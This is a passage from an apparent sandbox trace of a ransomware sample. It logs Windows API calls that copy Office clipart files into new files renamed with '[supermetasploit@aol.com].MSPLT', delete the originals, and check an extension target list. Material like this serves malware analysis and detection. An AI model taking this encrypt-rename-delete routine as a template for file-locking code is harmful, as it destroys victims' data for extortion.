dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0294.121] GetLastError () returned 0x0 [0294.121] ReadFile (in: hFile=0x440, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x19ec, lpOverlapped=0x0) returned 1 [0294.199] WriteFile (in: hFile=0x37c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x19f0, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x19f0, lpOverlapped=0x0) returned 1 [0294.201] ReadFile (in: hFile=0x440, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0294.201] WriteFile (in: hFile=0x37c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0294.201] SetEndOfFile (hFile=0x37c) returned 1 [0294.201] CloseHandle (hObject=0x37c) returned 1 [0294.202] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.202] SetEndOfFile (hFile=0x440) returned 1 [0294.206] CloseHandle (hObject=0x440) returned 1 [0294.207] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0294.207] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04191_.wmf")) returned 1 [0294.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 68 [0294.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 68 [0294.208] lstrlenW (lpString=".doc") returned 4 [0294.208] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0294.208] lstrlenW (lpString=".docx") returned 5 [0294.208] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0294.208] lstrlenW (lpString=".pdf") returned 4 [0294.208] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0294.208] lstrlenW (lpString=".xls") returned 4 [0294.208] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0294.208] lstrlenW (lpString=".xlsx") returned 5 [0294.208] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0294.209] lstrlenW (lpString=".ppt") returned 4 [0294.209] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0294.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 68 [0294.209] lstrlenW (lpString=".zip") returned 4 [0294.209] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0294.209] lstrlenW (lpString=".rar") returned 4 [0294.209] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0294.209] lstrlenW (lpString=".bz2") returned 4 [0294.209] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0294.209] lstrlenW (lpString=".7z") returned 3 [0294.209] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0294.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 68 [0294.209] lstrlenW (lpString=".dbf") returned 4 [0294.209] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0294.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 68 [0294.209] lstrlenW (lpString=".1cd") returned 4 [0294.209] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0294.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 68 [0294.209] lstrlenW (lpString=".jpg") returned 4 [0294.209] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0294.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 68 [0294.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 68 [0294.209] lstrlenW (lpString=".doc") returned 4 [0294.209] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0294.210] lstrlenW (lpString=".docx") returned 5 [0294.210] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0294.210] lstrlenW (lpString=".pdf") returned 4 [0294.210] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0294.210] lstrlenW (lpString=".xls") returned 4 [0294.210] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0294.210] lstrlenW (lpString=".xlsx") returned 5 [0294.210] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0294.210] lstrlenW (lpString=".ppt") returned 4 [0294.210] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0294.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 68 [0294.210] lstrlenW (lpString=".zip") returned 4 [0294.210] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0294.210] lstrlenW (lpString=".rar") returned 4 [0294.210] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0294.210] lstrlenW (lpString=".bz2") returned 4 [0294.210] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0294.210] lstrlenW (lpString=".7z") returned 3 [0294.210] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0294.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 68 [0294.210] lstrlenW (lpString=".dbf") returned 4 [0294.210] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0294.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 68 [0294.210] lstrlenW (lpString=".1cd") returned 4 [0294.210] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0294.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 68 [0294.210] lstrlenW (lpString=".jpg") returned 4 [0294.211] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0294.211] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0294.211] lstrlenW (lpString="AN04206_.WMF") returned 12 [0294.211] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04206_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0294.847] GetFileSizeEx (in: hFile=0x470, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=7668) returned 1 [0294.848] CloseHandle (hObject=0x470) returned 1 [0294.848] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04206_.wmf")) returned 0x220 [0294.848] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04206_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0294.848] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04206_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0294.848] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.849] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.849] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04206_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a0 [0294.850] GetLastError () returned 0x0 [0294.850] ReadFile (in: hFile=0x470, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x1df4, lpOverlapped=0x0) returned 1 [0294.852] WriteFile (in: hFile=0x4a0, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x1e00, lpOverlapped=0x0) returned 1 [0294.854] ReadFile (in: hFile=0x470, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0294.854] WriteFile (in: hFile=0x4a0, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0294.854] SetEndOfFile (hFile=0x4a0) returned 1 [0294.854] CloseHandle (hObject=0x4a0) returned 1 [0294.860] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.860] SetEndOfFile (hFile=0x470) returned 1 [0294.865] CloseHandle (hObject=0x470) returned 1 [0294.865] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0294.866] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04206_.wmf")) returned 1 [0294.866] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 68 [0294.866] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 68 [0294.866] lstrlenW (lpString=".doc") returned 4 [0294.867] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0294.867] lstrlenW (lpString=".docx") returned 5 [0294.867] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0294.867] lstrlenW (lpString=".pdf") returned 4 [0294.867] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0294.867] lstrlenW (lpString=".xls") returned 4 [0294.867] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0294.867] lstrlenW (lpString=".xlsx") returned 5 [0294.867] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0294.867] lstrlenW (lpString=".ppt") returned 4 [0294.867] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0294.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 68 [0294.867] lstrlenW (lpString=".zip") returned 4 [0294.867] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0294.867] lstrlenW (lpString=".rar") returned 4 [0294.867] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0294.867] lstrlenW (lpString=".bz2") returned 4 [0295.050] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0295.059] lstrlenW (lpString=".7z") returned 3 [0295.059] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0295.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 68 [0295.059] lstrlenW (lpString=".dbf") returned 4 [0295.059] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0295.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 68 [0295.059] lstrlenW (lpString=".1cd") returned 4 [0295.059] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0295.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 68 [0295.059] lstrlenW (lpString=".jpg") returned 4 [0295.059] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0295.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 68 [0295.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 68 [0295.059] lstrlenW (lpString=".doc") returned 4 [0295.059] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0295.059] lstrlenW (lpString=".docx") returned 5 [0295.059] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0295.059] lstrlenW (lpString=".pdf") returned 4 [0295.059] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0295.059] lstrlenW (lpString=".xls") returned 4 [0295.059] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0295.059] lstrlenW (lpString=".xlsx") returned 5 [0295.059] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0295.059] lstrlenW (lpString=".ppt") returned 4 [0295.059] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0295.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 68 [0295.059] lstrlenW (lpString=".zip") returned 4 [0295.059] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0295.059] lstrlenW (lpString=".rar") returned 4 [0295.059] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0295.060] lstrlenW (lpString=".bz2") returned 4 [0295.060] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0295.060] lstrlenW (lpString=".7z") returned 3 [0295.060] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0295.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 68 [0295.060] lstrlenW (lpString=".dbf") returned 4 [0295.060] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0295.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 68 [0295.060] lstrlenW (lpString=".1cd") returned 4 [0295.060] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0295.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 68 [0295.060] lstrlenW (lpString=".jpg") returned 4 [0295.060] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0295.060] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0295.060] lstrlenW (lpString="AN04326_.WMF") returned 12 [0295.060] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04326_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0295.064] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=3348) returned 1 [0295.064] CloseHandle (hObject=0x3d0) returned 1 [0295.064] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04326_.wmf")) returned 0x220 [0295.065] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04326_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0295.065] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04326_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0295.066] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.066] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.066] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04326_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0295.067] GetLastError () returned 0x0 [0295.067] ReadFile (in: hFile=0x3d0, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0xd14, lpOverlapped=0x0) returned 1 [0295.069] WriteFile (in: hFile=0x44c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xd20, lpOverlapped=0x0) returned 1 [0295.071] ReadFile (in: hFile=0x3d0, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0295.071] WriteFile (in: hFile=0x44c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0295.071] SetEndOfFile (hFile=0x44c) returned 1 [0295.071] CloseHandle (hObject=0x44c) returned 1 [0295.076] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.076] SetEndOfFile (hFile=0x3d0) returned 1 [0295.085] CloseHandle (hObject=0x3d0) returned 1 [0295.086] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0295.087] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04326_.wmf")) returned 1 [0295.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 68 [0295.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 68 [0295.088] lstrlenW (lpString=".doc") returned 4 [0295.088] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0295.088] lstrlenW (lpString=".docx") returned 5 [0295.088] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0295.088] lstrlenW (lpString=".pdf") returned 4 [0295.088] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0295.088] lstrlenW (lpString=".xls") returned 4 [0295.088] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0295.088] lstrlenW (lpString=".xlsx") returned 5 [0295.088] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0295.088] lstrlenW (lpString=".ppt") returned 4 [0295.088] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0295.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 68 [0295.088] lstrlenW (lpString=".zip") returned 4 [0295.088] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0295.088] lstrlenW (lpString=".rar") returned 4 [0295.088] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0295.088] lstrlenW (lpString=".bz2") returned 4 [0295.088] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0295.088] lstrlenW (lpString=".7z") returned 3 [0295.088] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0295.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 68 [0295.088] lstrlenW (lpString=".dbf") returned 4 [0295.088] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0295.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 68 [0295.089] lstrlenW (lpString=".1cd") returned 4 [0295.089] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0295.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 68 [0295.089] lstrlenW (lpString=".jpg") returned 4 [0295.089] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0295.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 68 [0295.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 68 [0295.089] lstrlenW (lpString=".doc") returned 4 [0295.089] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0295.089] lstrlenW (lpString=".docx") returned 5 [0295.089] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0295.089] lstrlenW (lpString=".pdf") returned 4 [0295.089] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0295.089] lstrlenW (lpString=".xls") returned 4 [0295.089] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0295.089] lstrlenW (lpString=".xlsx") returned 5 [0295.089] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0295.089] lstrlenW (lpString=".ppt") returned 4 [0295.089] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0295.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 68 [0295.089] lstrlenW (lpString=".zip") returned 4 [0295.089] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0295.089] lstrlenW (lpString=".rar") returned 4 [0295.089] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0295.089] lstrlenW (lpString=".bz2") returned 4 [0295.089] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0295.089] lstrlenW (lpString=".7z") returned 3 [0295.090] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0295.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 68 [0295.090] lstrlenW (lpString=".dbf") returned 4 [0295.090] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0295.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 68 [0295.090] lstrlenW (lpString=".1cd") returned 4 [0295.090] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0295.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 68 [0295.090] lstrlenW (lpString=".jpg") returned 4 [0295.090] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0295.090] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0295.090] lstrlenW (lpString="AN04355_.WMF") returned 12 [0295.090] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04355_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0295.091] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=3228) returned 1 [0295.091] CloseHandle (hObject=0x3d0) returned 1 [0295.091] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04355_.wmf")) returned 0x220 [0295.091] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04355_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0295.092] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04355_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0295.092] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.092] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.092] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04355_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0295.095] GetLastError () returned 0x0 [0295.095] ReadFile (in: hFile=0x3d0, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, 